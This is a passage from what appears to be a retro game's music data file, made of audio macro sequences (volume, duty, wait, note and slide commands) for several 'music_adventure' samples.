CHAN_VOLUME_HIGH(7) HALT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,2,9) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(5) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,32) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,31) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) SAMPLE_END .) music_adventure_sample_4: .( AUDIO_PULSE_META_NOTE_DUT_VOL(56,1,2,3) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,55) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(0) AUDIO_PULSE_META_NOTE_DUT_VOL(51,1,2,3) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(1) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) SAMPLE_END .) music_adventure_sample_5: .( AUDIO_PULSE_META_NOTE_DUT_VOL(56,1,2,3) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,55) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_HIGH(4) WAIT(1) CHAN_VOLUME_HIGH(3) WAIT(1) CHAN_VOLUME_HIGH(2) WAIT(1) CHAN_VOLUME_HIGH(1) WAIT(1) CHAN_VOLUME_HIGH(0) WAIT(1) CHAN_VOLUME_LOW(7) WAIT(1) CHAN_VOLUME_LOW(6) WAIT(1) CHAN_VOLUME_LOW(5) WAIT(1) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_LOW(3) WAIT(0) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) SAMPLE_END .) music_adventure_sample_6: .( AUDIO_PULSE_META_NOTE_DUT_VOL(51,1,2,3) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_HIGH(4) WAIT(1) CHAN_VOLUME_HIGH(3) WAIT(1) CHAN_VOLUME_HIGH(2) WAIT(1) CHAN_VOLUME_HIGH(1) WAIT(1) CHAN_VOLUME_HIGH(0) WAIT(1) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,56) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,55) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_HIGH(4) WAIT(1) CHAN_VOLUME_HIGH(3) WAIT(1) CHAN_VOLUME_HIGH(2) WAIT(1) CHAN_VOLUME_HIGH(1) WAIT(1) CHAN_VOLUME_HIGH(0) WAIT(1) CHAN_VOLUME_LOW(7) WAIT(1) CHAN_VOLUME_LOW(6) WAIT(1) CHAN_VOLUME_LOW(5) WAIT(1) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_LOW(3) WAIT(0) SAMPLE_END .) music_adventure_sample_7: .( AUDIO_PULSE_META_NOTE_DUT_VOL(13,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(13,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(13,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(12,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) SAMPLE_END .) music_adventure_sample_8: .( AUDIO_PULSE_META_NOTE_DSLIDE(37,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,0) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(4,41) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,41) AUDIO_PULSE_META_NOTE_DSLIDE(37,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,0) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(4,41) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,41) AUDIO_PULSE_META_NOTE_DSLIDE(37,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,0) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(4,41) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,41) AUDIO_PULSE_META_NOTE_DSLIDE(37,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,0) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(4,41) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,41) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(4,39) PLAY_TIMED_NOTE(4,43) PLAY_TIMED_NOTE(4,39) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(4,39) PLAY_TIMED_NOTE(4,43) PLAY_TIMED_NOTE(4,39) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(4,39) PLAY_TIMED_NOTE(4,43) PLAY_TIMED_NOTE(4,46) PLAY_TIMED_NOTE(4,48) PLAY_TIMED_NOTE(4,46) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,43) SAMPLE_END .) music_adventure_sample_9: .( AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) SAMPLE_END .) music_adventure_sample_10: .( AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) 